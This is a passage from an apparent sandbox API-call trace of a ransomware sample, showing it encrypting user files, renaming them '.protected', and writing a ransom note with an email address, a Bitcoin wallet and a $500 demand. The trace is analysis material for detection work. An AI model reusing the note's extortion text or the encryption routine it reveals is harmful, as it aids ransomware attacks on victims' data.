NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.078] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0093.079] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0093.079] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0093.079] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.079] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0093.079] CloseHandle (hObject=0xb4) returned 1 [0093.081] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.081] lstrcmpiW (lpString1="RgIELSgrJA-wX Ryy.flv", lpString2="Windows") returned -1 [0093.081] lstrcmpiW (lpString1="RgIELSgrJA-wX Ryy.flv", lpString2="Program Files") returned 1 [0093.081] lstrcmpiW (lpString1="RgIELSgrJA-wX Ryy.flv", lpString2="Program Files (x86)") returned 1 [0093.081] lstrcmpiW (lpString1="RgIELSgrJA-wX Ryy.flv", lpString2="$Recycle.bin") returned 1 [0093.081] lstrcmpiW (lpString1="RgIELSgrJA-wX Ryy.flv", lpString2="System Volume Information") returned -1 [0093.081] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\RgIELSgrJA-wX Ryy.flv") returned 62 [0093.081] StrStrIW (lpFirst="RgIELSgrJA-wX Ryy.flv", lpSrch=".protected") returned 0x0 [0093.082] lstrcmpW (lpString1="RgIELSgrJA-wX Ryy.flv", lpString2="RESTORE_FILES.txt") returned 1 [0093.082] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0093.082] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0093.082] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\RgIELSgrJA-wX Ryy.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\rgielsgrja-wx ryy.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0093.082] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\RgIELSgrJA-wX Ryy.flv") returned 62 [0093.082] StrStrW (lpFirst="RgIELSgrJA-wX Ryy.flv", lpSrch=".txt") returned 0x0 [0093.082] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\RgIELSgrJA-wX Ryy.flv") returned 62 [0093.082] StrStrW (lpFirst="RgIELSgrJA-wX Ryy.flv", lpSrch=".rar") returned 0x0 [0093.082] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\RgIELSgrJA-wX Ryy.flv") returned 62 [0093.082] StrStrW (lpFirst="RgIELSgrJA-wX Ryy.flv", lpSrch=".zip") returned 0x0 [0093.082] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0093.083] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.083] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0093.083] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.083] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0093.083] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0093.083] CloseHandle (hObject=0xb4) returned 1 [0093.084] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\RgIELSgrJA-wX Ryy.flv.protected") returned 72 [0093.084] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\RgIELSgrJA-wX Ryy.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\rgielsgrja-wx ryy.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\RgIELSgrJA-wX Ryy.flv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\rgielsgrja-wx ryy.flv.protected")) returned 1 [0093.085] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.085] lstrcmpiW (lpString1="Xf1q0UG.flv", lpString2="Windows") returned 1 [0093.085] lstrcmpiW (lpString1="Xf1q0UG.flv", lpString2="Program Files") returned 1 [0093.085] lstrcmpiW (lpString1="Xf1q0UG.flv", lpString2="Program Files (x86)") returned 1 [0093.085] lstrcmpiW (lpString1="Xf1q0UG.flv", lpString2="$Recycle.bin") returned 1 [0093.085] lstrcmpiW (lpString1="Xf1q0UG.flv", lpString2="System Volume Information") returned 1 [0093.085] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Xf1q0UG.flv") returned 52 [0093.085] StrStrIW (lpFirst="Xf1q0UG.flv", lpSrch=".protected") returned 0x0 [0093.085] lstrcmpW (lpString1="Xf1q0UG.flv", lpString2="RESTORE_FILES.txt") returned 1 [0093.085] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0093.085] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0093.085] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Xf1q0UG.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xf1q0ug.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0093.085] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Xf1q0UG.flv") returned 52 [0093.085] StrStrW (lpFirst="Xf1q0UG.flv", lpSrch=".txt") returned 0x0 [0093.085] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Xf1q0UG.flv") returned 52 [0093.085] StrStrW (lpFirst="Xf1q0UG.flv", lpSrch=".rar") returned 0x0 [0093.085] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Xf1q0UG.flv") returned 52 [0093.085] StrStrW (lpFirst="Xf1q0UG.flv", lpSrch=".zip") returned 0x0 [0093.086] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0093.086] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.086] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0093.087] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.087] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0093.087] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0093.087] CloseHandle (hObject=0xb4) returned 1 [0093.087] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Xf1q0UG.flv.protected") returned 62 [0093.087] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Xf1q0UG.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xf1q0ug.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Xf1q0UG.flv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xf1q0ug.flv.protected")) returned 1 [0093.088] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0093.088] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0093.088] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\RESTORE_FILES.txt") returned 58 [0093.088] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0093.089] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.089] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0093.089] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0093.089] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0093.089] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.089] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0093.090] CloseHandle (hObject=0xa4) returned 1 [0093.090] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0093.090] FindClose (in: hFindFile=0x47b950 | out: hFindFile=0x47b950) returned 1 [0093.090] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\RESTORE_FILES.txt") returned 51 [0093.090] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0093.091] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.091] WriteFile (in: hFile=0x104, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0093.092] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0093.092] WriteFile (in: hFile=0x104, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0093.092] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.092] WriteFile (in: hFile=0x104, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0093.092] CloseHandle (hObject=0x104) returned 1 [0093.092] FindNextFileW (in: hFindFile=0x47b910, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0093.092] lstrcmpiW (lpString1="All Users", lpString2="Windows") returned -1 [0093.092] lstrcmpiW (lpString1="All Users", lpString2="Program Files") returned -1 [0093.092] lstrcmpiW (lpString1="All Users", lpString2="Program Files (x86)") returned -1 [0093.092] lstrcmpiW (lpString1="All Users", lpString2="$Recycle.bin") returned 1 [0093.092] lstrcmpiW (lpString1="All Users", lpString2="System Volume Information") returned -1 [0093.092] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users") returned 22 [0093.092] lstrcmpW (lpString1="All Users", lpString2=".") returned 1 [0093.092] lstrcmpW (lpString1="All Users", lpString2="..") returned 1 [0093.092] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\*") returned 24 [0093.092] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x47b950 [0093.092] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.092] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.092] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.092] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.092] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.092] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\.") returned 24 [0093.092] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.092] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.092] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.092] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0093.093] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0093.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\." (normalized: "c:\\users\\all users\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.093] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0093.093] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.093] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.093] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.093] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.093] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.093] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\..") returned 25 [0093.093] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.093] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.093] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.093] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.093] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0093.093] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0093.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\.." (normalized: "c:\\users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.093] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0093.093] lstrcmpiW (lpString1="Adobe", lpString2="Windows") returned -1 [0093.093] lstrcmpiW (lpString1="Adobe", lpString2="Program Files") returned -1 [0093.093] lstrcmpiW (lpString1="Adobe", lpString2="Program Files (x86)") returned -1 [0093.093] lstrcmpiW (lpString1="Adobe", lpString2="$Recycle.bin") returned 1 [0093.093] lstrcmpiW (lpString1="Adobe", lpString2="System Volume Information") returned -1 [0093.093] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe") returned 28 [0093.093] lstrcmpW (lpString1="Adobe", lpString2=".") returned 1 [0093.093] lstrcmpW (lpString1="Adobe", lpString2="..") returned 1 [0093.093] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\*") returned 30 [0093.093] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0093.093] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.093] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.093] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.093] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.094] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.094] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\.") returned 30 [0093.094] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.094] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.094] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.094] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.094] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.094] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.094] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.094] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\..") returned 31 [0093.094] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.094] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.094] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.094] lstrcmpiW (lpString1="Acrobat", lpString2="Windows") returned -1 [0093.094] lstrcmpiW (lpString1="Acrobat", lpString2="Program Files") returned -1 [0093.094] lstrcmpiW (lpString1="Acrobat", lpString2="Program Files (x86)") returned -1 [0093.094] lstrcmpiW (lpString1="Acrobat", lpString2="$Recycle.bin") returned 1 [0093.094] lstrcmpiW (lpString1="Acrobat", lpString2="System Volume Information") returned -1 [0093.094] 